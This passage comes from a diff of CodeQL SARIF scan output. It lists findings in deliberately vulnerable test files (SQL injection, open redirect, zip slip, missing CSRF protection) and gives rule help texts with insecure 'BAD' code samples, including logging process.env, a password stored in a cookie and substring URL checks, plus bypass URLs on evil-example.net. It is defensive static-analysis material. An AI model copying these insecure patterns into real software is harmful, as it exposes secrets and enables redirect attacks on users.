value"}},{"id":26,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":23,"startColumn":40,"endColumn":61}},"message":{"text":"user-provided value"}},{"id":27,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":24,"startColumn":40,"endColumn":79}},"message":{"text":"user-provided value"}},{"id":28,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":24,"startColumn":40,"endColumn":61}},"message":{"text":"user-provided value"}},{"id":29,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":37,"startColumn":40,"endColumn":79}},"message":{"text":"user-provided value"}},{"id":30,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":37,"startColumn":40,"endColumn":61}},"message":{"text":"user-provided value"}},{"id":31,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":38,"startColumn":40,"endColumn":79}},"message":{"text":"user-provided value"}},{"id":32,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":38,"startColumn":40,"endColumn":61}},"message":{"text":"user-provided value"}},{"id":33,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":52,"startColumn":40,"endColumn":79}},"message":{"text":"user-provided value"}},{"id":34,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":52,"startColumn":40,"endColumn":61}},"message":{"text":"user-provided value"}},{"id":35,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":53,"startColumn":40,"endColumn":79}},"message":{"text":"user-provided value"}},{"id":36,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":53,"startColumn":40,"endColumn":61}},"message":{"text":"user-provided value"}},{"id":37,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":609},"region":{"startLine":7,"startColumn":28,"endColumn":66}},"message":{"text":"user-provided value"}},{"id":38,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":609},"region":{"startLine":7,"startColumn":28,"endColumn":49}},"message":{"text":"user-provided value"}},{"id":39,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":609},"region":{"startLine":16,"startColumn":28,"endColumn":66}},"message":{"text":"user-provided value"}},{"id":40,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":609},"region":{"startLine":16,"startColumn":28,"endColumn":49}},"message":{"text":"user-provided value"}},{"id":41,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":1,"startColumn":19,"endColumn":33}},"message":{"text":"user-provided value"}},{"id":42,"physicalLocation":{"artifactLocation":{"uri":"javascript/heuristic-models/tests/Sources/test.js","uriBaseId":"%SRCROOT%","index":3},"region":{"startLine":5,"startColumn":17,"endColumn":33}},"message":{"text":"user-provided value"}},{"id":43,"physicalLocation":{"artifactLocation":{"uri":"file:/opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/javascript/tools/data/externs/web/window.js","index":614},"region":{"startLine":56,"startColumn":5,"endColumn":13}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":6,"startColumn":17,"endColumn":51}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":13,"startColumn":23,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":21,"startColumn":23,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":782,"startColumn":18,"endColumn":38}}}]},{"ruleId":"js/xsjs-disabled-csrf-protection","rule":{"id":"js/xsjs-disabled-csrf-protection","index":5,"toolComponent":{"index":9}},"message":{"text":"CSRF protection is missing from the configuration."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/exposed/.xsaccess","uriBaseId":"%SRCROOT%","index":603},"region":{"startLine":1,"endLine":4,"endColumn":2}}}],"partialFingerprints":{"primaryLocationLineHash":"c1675fd626f895bf:1","primaryLocationStartColumnFingerprint":"0"}},{"ruleId":"js/xsjs-disabled-csrf-protection","rule":{"id":"js/xsjs-disabled-csrf-protection","index":5,"toolComponent":{"index":9}},"message":{"text":"CSRF protection should not be disabled."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/xs-app.json","uriBaseId":"%SRCROOT%","index":606},"region":{"startLine":14,"startColumn":31,"endColumn":36}}}],"partialFingerprints":{"primaryLocationLineHash":"c66a379bed25dd74:1","primaryLocationStartColumnFingerprint":"18"}}],"newlineSequences":["\r\n","\n","
","
"],"columnKind":"utf16CodeUnits","properties":{"semmle.formatSpecifier":"sarif-latest","metricResults":[{"rule":{"id":"js/summary/lines-of-user-code","index":100,"toolComponent":{"index":1}},"ruleId":"js/summary/lines-of-user-code","value":18058,"baseline":11978},{"rule":{"id":"js/summary/lines-of-code","index":101,"toolComponent":{"index":1}},"ruleId":"js/summary/lines-of-code","value":26473}],"codeqlConfigSummary":{"disableDefaultQueries":false,"queries":[{"type":"builtinSuite","uses":"security-extended"},{"type":"localQuery","uses":"./javascript/frameworks/ui5/src/codeql-suites/javascript-security-extended.qls"},{"type":"localQuery","uses":"./javascript/frameworks/cap/src/codeql-suites/javascript-security-extended.qls"},{"type":"localQuery","uses":"./javascript/frameworks/xsjs/src/codeql-suites/javascript-security-extended.qls"}]},"jobRunUuid":"0db37bfb-e416-462d-a06b-0d2dc7291f2f"}}]}
\ No newline at end of file
+{"$schema":"https://json.schemastore.org/sarif-2.1.0.json","version":"2.1.0","runs":[{"tool":{"driver":{"name":"CodeQL","organization":"GitHub","semanticVersion":"2.23.8","notifications":[{"id":"cli/expected-extracted-files/javascript","name":"cli/expected-extracted-files/javascript","shortDescription":{"text":"Expected extracted files"},"fullDescription":{"text":"Files appearing in the source archive that are expected to be extracted."},"defaultConfiguration":{"enabled":true},"properties":{"tags":["expected-extracted-files","telemetry"],"languageDisplayName":"JavaScript"}},{"id":"cli/expected-extracted-files/actions","name":"cli/expected-extracted-files/actions","shortDescription":{"text":"Expected extracted files"},"fullDescription":{"text":"Files appearing in the source archive that are expected to be extracted."},"defaultConfiguration":{"enabled":true},"properties":{"tags":["expected-extracted-files","telemetry"],"languageDisplayName":"GitHub Actions"}},{"id":"cli/expected-extracted-files/typescript","name":"cli/expected-extracted-files/typescript","shortDescription":{"text":"Expected extracted files"},"fullDescription":{"text":"Files appearing in the source archive that are expected to be extracted."},"defaultConfiguration":{"enabled":true},"properties":{"tags":["expected-extracted-files","telemetry"],"languageDisplayName":"TypeScript"}},{"id":"cli/expected-extracted-files/python","name":"cli/expected-extracted-files/python","shortDescription":{"text":"Expected extracted files"},"fullDescription":{"text":"Files appearing in the source archive that are expected to be extracted."},"defaultConfiguration":{"enabled":true},"properties":{"tags":["expected-extracted-files","telemetry"],"languageDisplayName":"Python"}},{"id":"cli/platform","name":"cli/platform","shortDescription":{"text":"Platform"},"fullDescription":{"text":"Platform"},"defaultConfiguration":{"enabled":true}},{"id":"codeql-action/zstd-availability","name":"codeql-action/zstd-availability","shortDescription":{"text":"Zstandard availability"},"fullDescription":{"text":"Zstandard availability"},"defaultConfiguration":{"enabled":true}}],"rules":[]},"extensions":[{"name":"generated/extension-pack","semanticVersion":"0.0.0","locations":[{"uri":"file:///home/runner/work/_temp/codeql-database/javascript/temp/extension-pack/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///home/runner/work/_temp/codeql-database/javascript/temp/extension-pack/codeql-pack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}],"properties":{"isCodeQLModelPack":true}},{"name":"codeql/javascript-queries","semanticVersion":"2.2.3+28b6aa8616a393ebb45186e3ba4df004a0f3ef4e","notifications":[{"id":"js/diagnostics/successfully-extracted-files","name":"js/diagnostics/successfully-extracted-files","shortDescription":{"text":"Extracted files"},"fullDescription":{"text":"Lists all files in the source code directory that were extracted."},"defaultConfiguration":{"enabled":true},"properties":{"tags":["successfully-extracted-files"],"description":"Lists all files in the source code directory that were extracted.","id":"js/diagnostics/successfully-extracted-files","kind":"diagnostic","name":"Extracted files"}},{"id":"js/diagnostics/extraction-errors","name":"js/diagnostics/extraction-errors","shortDescription":{"text":"Extraction errors"},"fullDescription":{"text":"List all extraction errors for files in the source code directory."},"defaultConfiguration":{"enabled":true},"properties":{"description":"List all extraction errors for files in the source code directory.","id":"js/diagnostics/extraction-errors","kind":"diagnostic","name":"Extraction errors"}}],"rules":[{"id":"js/clear-text-logging","name":"js/clear-text-logging","shortDescription":{"text":"Clear-text logging of sensitive information"},"fullDescription":{"text":"Logging sensitive information without encryption or hashing can expose it to an attacker."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Clear-text logging of sensitive information\nIf sensitive data is written to a log entry it could be exposed to an attacker who gains access to the logs.\n\nPotential attackers can obtain sensitive user data when the log output is displayed. Additionally that data may expose system information such as full path names, system information, and sometimes usernames and passwords.\n\n\n## Recommendation\nSensitive data should not be logged.\n\n\n## Example\nIn the example the entire process environment is logged using \\`console.info\\`. Regular users of the production deployed application should not have access to this much information about the environment configuration.\n\n\n```javascript\n// BAD: Logging cleartext sensitive data\nconsole.info(`[INFO] Environment: ${JSON.stringify(process.env)}`);\n\n```\nIn the second example the data that is logged is not sensitive.\n\n\n```javascript\nlet not_sensitive_data = { a: 1, b : 2} \n// GOOD: it is fine to log data that is not sensitive\nconsole.info(`[INFO] Some object contains: ${JSON.stringify(not_sensitive_data)}`);\n```\n\n## References\n* OWASP: [Insertion of Sensitive Information into Log File](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n* Common Weakness Enumeration: [CWE-532](https://cwe.mitre.org/data/definitions/532.html).\n","markdown":"# Clear-text logging of sensitive information\nIf sensitive data is written to a log entry it could be exposed to an attacker who gains access to the logs.\n\nPotential attackers can obtain sensitive user data when the log output is displayed. Additionally that data may expose system information such as full path names, system information, and sometimes usernames and passwords.\n\n\n## Recommendation\nSensitive data should not be logged.\n\n\n## Example\nIn the example the entire process environment is logged using \\`console.info\\`. Regular users of the production deployed application should not have access to this much information about the environment configuration.\n\n\n```javascript\n// BAD: Logging cleartext sensitive data\nconsole.info(`[INFO] Environment: ${JSON.stringify(process.env)}`);\n\n```\nIn the second example the data that is logged is not sensitive.\n\n\n```javascript\nlet not_sensitive_data = { a: 1, b : 2} \n// GOOD: it is fine to log data that is not sensitive\nconsole.info(`[INFO] Some object contains: ${JSON.stringify(not_sensitive_data)}`);\n```\n\n## References\n* OWASP: [Insertion of Sensitive Information into Log File](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n* Common Weakness Enumeration: [CWE-532](https://cwe.mitre.org/data/definitions/532.html).\n"},"properties":{"tags":["security","external/cwe/cwe-312","external/cwe/cwe-359","external/cwe/cwe-532"],"description":"Logging sensitive information without encryption or hashing can\n              expose it to an attacker.","id":"js/clear-text-logging","kind":"path-problem","name":"Clear-text logging of sensitive information","precision":"high","problem.severity":"error","security-severity":"7.5"}},{"id":"js/clear-text-storage-of-sensitive-data","name":"js/clear-text-storage-of-sensitive-data","shortDescription":{"text":"Clear text storage of sensitive information"},"fullDescription":{"text":"Sensitive information stored without encryption or hashing can expose it to an attacker."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Clear text storage of sensitive information\nSensitive information that is stored unencrypted is accessible to an attacker who gains access to the storage. This is particularly important for cookies, which are stored on the machine of the end-user.\n\n\n## Recommendation\nEnsure that sensitive information is always encrypted before being stored. If possible, avoid placing sensitive information in cookies altogether. Instead, prefer storing, in the cookie, a key that can be used to look up the sensitive information.\n\nIn general, decrypt sensitive information only at the point where it is necessary for it to be used in cleartext.\n\nBe aware that external processes often store the `standard out` and `standard error` streams of the application, causing logged sensitive information to be stored as well.\n\n\n## Example\nThe following example code stores user credentials (in this case, their password) in a cookie in plain text:\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n  let pw = req.param(\"current_password\");\n  // BAD: Setting a cookie value with cleartext sensitive data.\n  res.cookie(\"password\", pw);\n});\n\n```\nInstead, the credentials should be encrypted, for instance by using the Node.js `crypto` module:\n\n\n```javascript\nvar express = require('express');\nvar crypto = require('crypto'),\n    password = getPassword();\n\nfunction encrypt(text){\n  var cipher = crypto.createCipher('aes-256-ctr', password);\n  return cipher.update(text, 'utf8', 'hex') + cipher.final('hex');\n}\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n  let pw = req.param(\"current_password\");\n  // GOOD: Encoding the value before setting it.\n  res.cookie(\"password\", encrypt(pw));\n});\n\n```\n\n## References\n* M. Dowd, J. McDonald and J. Schuhm, *The Art of Software Security Assessment*, 1st Edition, Chapter 2 - 'Common Vulnerabilities of Encryption', p. 43. Addison Wesley, 2006.\n* M. Howard and D. LeBlanc, *Writing Secure Code*, 2nd Edition, Chapter 9 - 'Protecting Secret Data', p. 299. Microsoft, 2002.\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n","markdown":"# Clear text storage of sensitive information\nSensitive information that is stored unencrypted is accessible to an attacker who gains access to the storage. This is particularly important for cookies, which are stored on the machine of the end-user.\n\n\n## Recommendation\nEnsure that sensitive information is always encrypted before being stored. If possible, avoid placing sensitive information in cookies altogether. Instead, prefer storing, in the cookie, a key that can be used to look up the sensitive information.\n\nIn general, decrypt sensitive information only at the point where it is necessary for it to be used in cleartext.\n\nBe aware that external processes often store the `standard out` and `standard error` streams of the application, causing logged sensitive information to be stored as well.\n\n\n## Example\nThe following example code stores user credentials (in this case, their password) in a cookie in plain text:\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n  let pw = req.param(\"current_password\");\n  // BAD: Setting a cookie value with cleartext sensitive data.\n  res.cookie(\"password\", pw);\n});\n\n```\nInstead, the credentials should be encrypted, for instance by using the Node.js `crypto` module:\n\n\n```javascript\nvar express = require('express');\nvar crypto = require('crypto'),\n    password = getPassword();\n\nfunction encrypt(text){\n  var cipher = crypto.createCipher('aes-256-ctr', password);\n  return cipher.update(text, 'utf8', 'hex') + cipher.final('hex');\n}\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n  let pw = req.param(\"current_password\");\n  // GOOD: Encoding the value before setting it.\n  res.cookie(\"password\", encrypt(pw));\n});\n\n```\n\n## References\n* M. Dowd, J. McDonald and J. Schuhm, *The Art of Software Security Assessment*, 1st Edition, Chapter 2 - 'Common Vulnerabilities of Encryption', p. 43. Addison Wesley, 2006.\n* M. Howard and D. LeBlanc, *Writing Secure Code*, 2nd Edition, Chapter 9 - 'Protecting Secret Data', p. 299. Microsoft, 2002.\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n"},"properties":{"tags":["security","external/cwe/cwe-312","external/cwe/cwe-315","external/cwe/cwe-359"],"description":"Sensitive information stored without encryption or hashing can expose it to an\n              attacker.","id":"js/clear-text-storage-of-sensitive-data","kind":"path-problem","name":"Clear text storage of sensitive information","precision":"high","problem.severity":"error","security-severity":"7.5"}},{"id":"js/build-artifact-leak","name":"js/build-artifact-leak","shortDescription":{"text":"Storage of sensitive information in build artifact"},"fullDescription":{"text":"Including sensitive information in a build artifact can expose it to an attacker."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Storage of sensitive information in build artifact\nSensitive information included in a build artifact can allow an attacker to access the sensitive information if the artifact is published.\n\n\n## Recommendation\nOnly store information that is meant to be publicly available in a build artifact.\n\n\n## Example\nThe following example creates a `webpack` configuration that inserts all environment variables from the host into the build artifact:\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n    plugins: [\n        new webpack.DefinePlugin({\n            \"process.env\": JSON.stringify(process.env)\n        })\n    ]\n}];\n```\nThe environment variables might include API keys or other sensitive information, and the build-system should instead insert only the environment variables that are supposed to be public.\n\nThe issue has been fixed below, where only the `DEBUG` environment variable is inserted into the artifact.\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n    plugins: [\n        new webpack.DefinePlugin({\n            'process.env': JSON.stringify({ DEBUG: process.env.DEBUG })\n        })\n    ]\n}];\n\n```\n\n## References\n* webpack: [DefinePlugin API](https://webpack.js.org/plugins/define-plugin/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n","markdown":"# Storage of sensitive information in build artifact\nSensitive information included in a build artifact can allow an attacker to access the sensitive information if the artifact is published.\n\n\n## Recommendation\nOnly store information that is meant to be publicly available in a build artifact.\n\n\n## Example\nThe following example creates a `webpack` configuration that inserts all environment variables from the host into the build artifact:\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n    plugins: [\n        new webpack.DefinePlugin({\n            \"process.env\": JSON.stringify(process.env)\n        })\n    ]\n}];\n```\nThe environment variables might include API keys or other sensitive information, and the build-system should instead insert only the environment variables that are supposed to be public.\n\nThe issue has been fixed below, where only the `DEBUG` environment variable is inserted into the artifact.\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n    plugins: [\n        new webpack.DefinePlugin({\n            'process.env': JSON.stringify({ DEBUG: process.env.DEBUG })\n        })\n    ]\n}];\n\n```\n\n## References\n* webpack: [DefinePlugin API](https://webpack.js.org/plugins/define-plugin/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n"},"properties":{"tags":["security","external/cwe/cwe-312","external/cwe/cwe-315","external/cwe/cwe-359"],"description":"Including sensitive information in a build artifact can\n              expose it to an attacker.","id":"js/build-artifact-leak","kind":"path-problem","name":"Storage of sensitive information in build artifact","precision":"high","problem.severity":"error","security-severity":"7.5"}},{"id":"js/incorrect-suffix-check","name":"js/incorrect-suffix-check","shortDescription":{"text":"Incorrect suffix check"},"fullDescription":{"text":"Using indexOf to implement endsWith functionality is error-prone if the -1 case is not explicitly handled."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Incorrect suffix check\nThe `indexOf` and `lastIndexOf` methods are sometimes used to check if a substring occurs at a certain position in a string. However, if the returned index is compared to an expression that might evaluate to -1, the check may pass in some cases where the substring was not found at all.\n\nSpecifically, this can easily happen when implementing `endsWith` using `indexOf`.\n\n\n## Recommendation\nUse `String.prototype.endsWith` if it is available. Otherwise, explicitly handle the -1 case, either by checking the relative lengths of the strings, or by checking if the returned index is -1.\n\n\n## Example\nThe following example uses `lastIndexOf` to determine if the string `x` ends with the string `y`:\n\n\n```javascript\nfunction endsWith(x, y) {\n  return x.lastIndexOf(y) === x.length - y.length;\n}\n\n```\nHowever, if `y` is one character longer than `x`, the right-hand side `x.length - y.length` becomes -1, which then equals the return value of `lastIndexOf`. This will make the test pass, even though `x` does not end with `y`.\n\nTo avoid this, explicitly check for the -1 case:\n\n\n```javascript\nfunction endsWith(x, y) {\n  let index = x.lastIndexOf(y);\n  return index !== -1 && index === x.length - y.length;\n}\n\n```\n\n## References\n* MDN: [String.prototype.endsWith](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith)\n* MDN: [String.prototype.indexOf](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/indexOf)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n","markdown":"# Incorrect suffix check\nThe `indexOf` and `lastIndexOf` methods are sometimes used to check if a substring occurs at a certain position in a string. However, if the returned index is compared to an expression that might evaluate to -1, the check may pass in some cases where the substring was not found at all.\n\nSpecifically, this can easily happen when implementing `endsWith` using `indexOf`.\n\n\n## Recommendation\nUse `String.prototype.endsWith` if it is available. Otherwise, explicitly handle the -1 case, either by checking the relative lengths of the strings, or by checking if the returned index is -1.\n\n\n## Example\nThe following example uses `lastIndexOf` to determine if the string `x` ends with the string `y`:\n\n\n```javascript\nfunction endsWith(x, y) {\n  return x.lastIndexOf(y) === x.length - y.length;\n}\n\n```\nHowever, if `y` is one character longer than `x`, the right-hand side `x.length - y.length` becomes -1, which then equals the return value of `lastIndexOf`. This will make the test pass, even though `x` does not end with `y`.\n\nTo avoid this, explicitly check for the -1 case:\n\n\n```javascript\nfunction endsWith(x, y) {\n  let index = x.lastIndexOf(y);\n  return index !== -1 && index === x.length - y.length;\n}\n\n```\n\n## References\n* MDN: [String.prototype.endsWith](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith)\n* MDN: [String.prototype.indexOf](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/indexOf)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n"},"properties":{"tags":["security","correctness","external/cwe/cwe-020"],"description":"Using indexOf to implement endsWith functionality is error-prone if the -1 case is not explicitly handled.","id":"js/incorrect-suffix-check","kind":"problem","name":"Incorrect suffix check","precision":"high","problem.severity":"error","security-severity":"7.8"}},{"id":"js/incomplete-url-substring-sanitization","name":"js/incomplete-url-substring-sanitization","shortDescription":{"text":"Incomplete URL substring sanitization"},"fullDescription":{"text":"Security checks on the substrings of an unparsed URL are often vulnerable to bypassing."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Incomplete URL substring sanitization\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Usually, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nHowever, treating the URL as a string and checking if one of the allowed hosts is a substring of the URL is very prone to errors. Malicious URLs can bypass such security checks by embedding one of the allowed hosts in an unexpected location.\n\nEven if the substring check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when the check succeeds accidentally.\n\n\n## Recommendation\nParse a URL before performing a check on its host value, and ensure that the check handles arbitrary subdomain sequences correctly.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n    let url = req.param(\"url\");\n    // BAD: the host of `url` may be controlled by an attacker\n    if (url.includes(\"example.com\")) {\n        res.redirect(url);\n    }\n});\n\n```\nThe substring check is, however, easy to bypass. For example by embedding `example.com` in the path component: `http://evil-example.net/example.com`, or in the query string component: `http://evil-example.net/?x=example.com`. Address these shortcomings by checking the host of the parsed URL instead:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n    let url = req.param(\"url\"),\n        host = urlLib.parse(url).host;\n    // BAD: the host of `url` may be controlled by an attacker\n    if (host.includes(\"example.com\")) {\n        res.redirect(url);\n    }\n});\n\n```\nThis is still not a sufficient check as the following URLs bypass it: `http://evil-example.com` `http://example.com.evil-example.net`. Instead, use an explicit whitelist of allowed hosts to make the redirect secure:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n    let url = req.param('url'),\n        host = urlLib.parse(url).host;\n    // GOOD: the host of `url` can not be controlled by an attacker\n    let allowedHosts = [\n        'example.com',\n        'beta.example.com',\n        'www.example.com'\n    ];\n    if (allowedHosts.includes(host)) {\n        res.redirect(url);\n    }\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n","markdown":"# Incomplete URL substring sanitization\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Usually, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nHowever, treating the URL as a string and checking if one of the allowed hosts is a substring of the URL is very prone to errors. Malicious URLs can bypass such security checks by embedding one of the allowed hosts in an unexpected location.\n\nEven if the substring check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when the check succeeds accidentally.\n\n\n## Recommendation\nParse a URL before performing a check on its host value, and ensure that the check handles arbitrary subdomain sequences correctly.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n    let url = req.param(\"url\");\n    // BAD: the host of `url` may be controlled by an attacker\n    if (url.includes(\"example.com\")) {\n        res.redirect(url);\n    }\n});\n\n```\nThe substring check is, however, easy to bypass. For example by embedding `example.com` in the path component: `http://evil-example.net/example.com`, or in the query string component: `http://evil-example.net/?x=example.com`. Address these shortcomings by checking the host of the parsed URL instead:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n    let url = req.param(\"url\"),\n        host = urlLib.parse(url).host;\n    // BAD: the host of `url` may be controlled by an attacker\n    if (host.includes(\"example.com\")) {\n        res.redirect(url);\n    }\n});\n\n```\nThis is still not a sufficient check as the following URLs bypass it: `http://evil-example.com` `http://example.com.evil-example.net`. Instead, use an explicit whitelist of allowed hosts to make the redirect secure:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n    let url = req.param('url'),\n        host = urlLib.parse(url).host;\n    // GOOD: the host of `url` can not be controlled by an attacker\n    let allowedHosts = [\n        'example.com',\n        'beta.example.com',\n        'www.example.com'\n    ];\n    if (allowedHosts.includes(host)) {\n        res.redirect(url);\n    }\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-020"],"description":"Security checks on the substrings of an unparsed URL are often vulnerable to bypassing.","id":"js/incomplete-url-substring-sanitization","kind":"problem","name":"Incomplete URL substring sanitization","precision":"high","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/incomplete-hostname-regexp","name":"js/incomplete-hostname-regexp","shortDescription":{"text":"Incomplete regular expression for hostnames"},"fullDescription":{"text":"Matching a URL or hostname against a regular expression that contains an unescaped dot as part of the hostname might match more hostnames than 